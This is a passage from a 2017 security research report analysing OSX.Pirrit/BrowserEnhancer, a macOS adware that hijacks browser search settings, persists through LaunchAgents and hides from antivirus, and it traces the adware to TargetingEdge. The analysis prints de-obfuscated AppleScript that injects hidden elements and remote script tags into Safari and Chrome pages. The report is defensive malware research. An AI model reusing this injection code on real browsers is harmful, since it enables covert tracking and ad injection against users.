​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ This script will also try to do what TargetingEdge calls a “pure install”. It’s basically executing the ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ app bundle that was in the archive - BrowserEnhancer.app. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **Analyzing​** **_BrowserEnhancer.app​_** **: ​** Since BrowserEnhancher.app is an actual binary executable (inside an app bundle, of course), ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ it requires some proper reverse engineering work: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Right off the bat, when looking at the dylibs that the binary is loading, we can see that just like ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ last year’s OSX.Pirrit, this is yet another QT project: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ This is also evident when looking at some of the internal functions and data types in the binary: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 11 ----- _BrowserEnhancer.app’s​_ ​ has​ ​ several​ ​ responsibilities​ ​ but​ ​ its​ ​ major​ ​ one​ ​ is​ ​ reconfiguring ​ properties​ inside​ ​ the​ ​ internals​ ​ of​ ​ all​ ​ the​ ​ installed​ ​ browsers.​ ​ _BrowserEnhancer​_ ​ will​ ​ search​ ​ the ​ system for installations of these browsers: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ - Firefox - Safari - Chrome - Internet explorer (See below). ​ ​ ​ ​ ​ ​ This function is trying to read a Windows registry value related to Internet Explorer so that it ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ could change some settings. Obviously, this function is in for some serious disappointment ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ since this is a Mach-O executable running on macOS. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 12 ----- Once​ the​ ​ browsers​ ​ are​ ​ found,​ ​ _BrowserEnhancer​_ ​ will​ ​ modify​ ​ their​ ​ search​ ​ provider​ ​ settings ​ from the browser’s default to **http://tika-search[.]com.** A quick visit to Tika-search’s about page ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ shows us that this is actually another venture of [Download](https://en.wikipedia.org/wiki/Download_Valley) Valley’s Goliath: Babylon Software. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 13 ----- In other cases, depending on the browser’s setting or geolocation, the search provider will be ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ switched to http://delta-search[.]com. ​ ​ ​ ​ ​ Visiting delta-search reveals a site that’s nearly identical to tika-search. Only the logo is ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ different. Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 14 ----- Once​ _BrowserEnhancer​_ ​ was​ ​ executed​ ​ and​ ​ installed,​ ​ a​ ​ script​ ​ called​ ​ _post_install.sh​_ ​ stops​ ​ all ​ running instances of Firefox and Chrome and restarts them so the changes can take effect. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Note the use of _osascript,_ which we will get back to later. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 15 ----- Once​ _updater​_ ​ and​ ​ _BrowserEnhacner​_ ​ are​ ​ installed,​ ​ the​ ​ main​ ​ installation​ ​ script​ ​ downloads ​ another archive file called uj_v_5.3_rf.tgz: ​ ​ ​ ​ ​ ​ ​ ​ The​ content​ ​ of​ ​ the​ ​ file​ ​ is​ ​ then​ ​ extracted​ ​ to​ ​ _/var/tmp/mako​_ . ​ That directory contains yet another binary executable called _macver_ and yet another installation ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ script called _install.sh_ and a _plist_ file named _macver.plist._ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​​ ​ ​ ​ ​ ​ ​ **Let’s** **examine** **the** **installation** **script:** ​ ​ ​ ​ ​ ​ ​ ​ The installation script starts with the TargetingEdge’s favorite modus-operandi: Generating a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ random​ name​ ​ from​ ​ the​ ​ wordlist​ ​ in​ ​ _/usr/share/dict/words​_ : ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 16 ----- Once a random name is chosen, the script uses _defaults_ to write a new plist file to ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ _~/Library/Preferences/com.application.plist.​_ ​ It​ ​ will​ ​ add​ ​ a​ ​ new​ ​ dictionary​ ​ entry​ ​ to ​ that file. The dictionary will contain the random name that was chosen for the new executable by ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the installation and the name for the plist that holds its preferences: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ As​ we​ ​ can​ ​ see,​ ​ it​ ​ points​ ​ to​ ​ _com.sailcloth.plist​_ .​ ​ Let’s​ ​ look​ ​ at​ ​ that​ ​ file: ​ As we can see, the file contains the machine-uuid, and a URL that should be loaded each time ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the browser is directed to visit google.com. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Once those plists are written, the script will then continue to create and run **individual** ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **LaunchAgents** **that** **will** **run** **_macver_** **for** **every** **user** **on** **the** **machine** **but** **the** **guest** **user:** ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **Breaking​** **apart​** ​ **_macver​_** **: ​** Dry facts first: ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 17 ----- _macver​_ is​ ​ a​ ​ Mach-O​ ​ 64-bit​ ​ executable​ ​ file.​ ​ It​ ​ is​ ​ not​ ​ importing​ ​ any​ ​ third-party​ ​ frameworks​ ​ such ​ as Qt (for a change). However, closely examining this executable reveals some interesting ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ details. The strings section of the file contain a lot of base64 obfuscated content: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ De-obfuscating the base64 strings reveals the following code: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ global _pid ​ ​ set _pid to "pid_value_to_replace" ​ ​ ​ ​ ​ ​ repeat «event XFdrIjct» {} ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 18 ----- end repeat ​ ​ on «event XFdrIjct» {} ​ ​ ​ ​ ​ ​ delay 0.5 ​ ​ try if is_Safari_running() then ​ ​ ​ ​ tell application "Safari" ​ ​ ​ ​ tell application "Safari" to set page_source to do JavaScript "document.body.innerHTML;" in ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ current tab of first window ​ ​ ​ ​ ​ ​ ​ ​ if page_source does not contain _pid then ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ set theURL to URL of current tab of first window ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ if theURL is not equal to "about:blank" then ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ tell application "Safari" to do JavaScript "var pidDiv = document.createElement('div'); ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ pidDiv.style.display = \"none\"; pidDiv.innerHTML = \"" & _pid & "\"; ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ document.getElementsByTagName('body')[0].appendChild(pidDiv);" in current tab of first ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ window tell application "Safari" to do JavaScript "var js_script = document.createElement('script'); ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ js_script.type = \"text/javascript\"; js_script.src = \"script_to_inject\"; ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ document.getElementsByTagName('head')[0].appendChild(js_script);" in current tab of first ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ window end if ​ ​ end if ​ ​ end tell ​ ​ end if ​ ​ end try ​ ​ end «event XFdrIjct» ​ ​ ​ ​ on is_Safari_running() ​ ​ tell application "System Events" to (name of processes) contains "Safari" ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Here is another example: ​ ​ ​ ​ ​ ​ on «event XFdrIjct» {} ​ ​ ​ ​ ​ ​ delay 0.5 ​ ​ try if is_Chrome_running() then ​ ​ ​ ​ tell application "Google Chrome" to tell active tab of window 1 ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ set sourceHtml to execute javascript ​ ​ ​ ​ ​ ​ ​ ​ "document.getElementsByTagName('html')[0].innerHTML" if sourceHtml does not contain _pid then ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ tell application "Google Chrome" to execute front window's active tab javascript "var pidDiv = ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ document.createElement('div'); pidDiv.style = \"display:none\"; pidDiv.innerHTML = \"" & _pid ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ & "\"; document.getElementsByTagName('body')[0].appendChild(pidDiv);" ​ ​ ​ ​ tell application "Google Chrome" to execute front window's active tab javascript "var js_script ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ = document.createElement('script'); js_script.type = \"text/javascript\"; js_script.src = ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 19 ----- \"script_to_inject\"; document.getElementsByTagName('head')[0].appendChild(js_script);" ​ ​ end if ​ ​ end tell ​ ​ end if ​ ​ end try ​ ​ end «event XFdrIjct» ​ ​ ​ ​ on is_Chrome_running() ​ ​ tell application "System Events" to (name of processes) contains "Google Chrome" ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ That code is [AppleScript](https://en.wikipedia.org/wiki/AppleScript) (Jonathan Levin’s book *OS Internals volume I thoroughly covers ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Applescript’s inner workings) and injects JavaScript code directly into the browser. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Like I said earlier, this variant uses AppleScript. Instead of running a proxy server to intercept ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ traffic or installing a browser plug-in that can be easily removed, the authors use Applescript ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ (which was originally meant for automation purposes) to inject javascript directly to the browser. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Using AppleScript, the authors can exfiltrate and inject both information and code from/to other ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ apps. In this case, AppleScript is used to poll the running browser for the currently viewed URL. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Then, a block of JS code is injected into a hidden _
_ in every page that the browser is ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ visiting. That code is used to extract information, to track the user and to plant code in the page ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ if needed. ​ ​ **Here’s** **the** **process:** ​ ​ ​ ​ _Macver​_ is​ ​ running​ ​ and​ ​ executing​ ​ (via​ ​ _NSTASK​_ )​ ​ [osascript​](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/osascript.1.html) ​ (the​ ​ AppleScript​ ​ interpreter),​ ​ which​ ​ will ​ execute the aforementioned (and some other) scripts that are going to interact and in fact “hook” ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ (to borrow terminology from [BeEF)](http://beefproject.com/) the browser. Once a browser is hooked, macver can read ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ and write (or inject) content to and from it. Once the browser loads a website, _macver_ knows ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ exactly what website is being visited and will then inject ads into the browser. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 20 ----- In this example, once macver was running, I went to Google and searched for “error.” After I ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ submitted the result, the browser immediately opened a new tab that displayed an ad for ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ MacKeeper, the well-known, fake antivirus program for Macs. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ In the following image we can see _macver_ running in its own terminal window. By default, ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ _macver_ prints to _stdout_ a lot of debug information so there is actually very little need for ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ debugging: Meanwhile, in the browser: ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 21 ----- Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 22 ----- **Attribution:** TargetingEdge has taken extraordinary efforts to distance itself from from the code that’s ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ running on an amazing number of machines worldwide. After analyzing different samples, I had ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ several C&C domains (the ones that are used to “phone home” to the authors and tell them ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ which machines are infected). Every domain was registered with a privacy guard so there was ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ no way to find out who registered it using public information. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Eventually, I started cross-referencing domains with each other using ThreatCrowd and found ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ that some domains were not registered with a privacy guard. This was probably a mistake. A ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ mistake was how I figured out who was behind OSX.Pirrit last year. I found the names of ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ TargetingEdge employees inside the permission tables of the dropped files. But they learned ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ from that mistake. They are no longer using their first and last names as usernames - they have ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ switched to use more amusing names: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 23 ----- The non-private domains also had a DGA pattern and were connected to the same IP address, ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ which is connected to other TargetingEdge domains. These included a privacy guard. As ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ThreatCrowd clearly shows, the non-private domains were registered by a person associated ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ with TargetingEdge: ​ ​ And that’s not the only domain that’s connected to TargetingEdge. Here’s some whois data on ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ 3fzf1fseg1xzgd1e5[.]us: Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 24 ----- According to LinkedIn, this individual was a senior executive at TargetingEdge and he is ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ currently the CEO of a “Blockchain-based digital advertising company.” ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **Wrapping** **things** **up:** ​ ​ ​ ​ As I said before, Pirrit/BrowserEnhancer/DaVinci (or whatever you want to call it) is not a ground ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ breaking threat. However, it is a great example of how an adtech company is borrowing ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ nefarious tactics found in malware to make it hard for antivirus software and other security ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ products to detect them. There is no difference between traditional malware that steals data ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ from its victims and adware that spies on people’s Web browsing and target them with ads, ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 25 ----- especially when those ads are for either fake antivirus programs or Apple support scams. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Adware is just another type of malware. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ As for OSX.Pirrit malware, it runs under root privileges, creates autoruns and generates random ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ names for itself on each install. Plus, there are no removal instructions and some of its ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ components mask themselves to appear like they’re legitimate and from Apple. And don’t forget ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ that TargetingEdge used domains that appeared to be generated by some sort of DGA and ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ made many attempts to hide any link between the domains and TargetingEdge. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ OSX.Pirrit/BrowserEnhancer/DaVinci checks every box on the malware checklist and should be ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ treated that way, even if its authors don’t like it. The security industry created the term ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ “potentially unwanted program”, or “PUPs”, to handle adware companies that try to intimidate ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ security companies that identify their products as malware by sending them cease and desist ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ letters. It’s time for a paradigm shift. If there’s code that’s mining data and hiding itself on a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ computer without any way of removing it, that’s malware, plain and simple. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 26 ----- #### ABOUT THE AUTHOR ## AUTHOR ###### AMIT SERPER PRINCIPAL SECURITY RESEARCHER Amit leads the security research at Cybereason’s Boston HQ. He specializes in low-level, vulnerability and kernel research, malware analysis and reverse engineering on Windows, Linux and macOS. He also has extensive experience researching, reverse engineering, and exploiting IoT devices of various kinds. Prior to joining Cybereason, Amit spent nine years leading security research projects and teams for an Israeli government intelligence agency, specifically in embedded systems security (or lack of). #### ABOUT THE AUTHOR ## AUTHOR ###### AMIT SERPER -----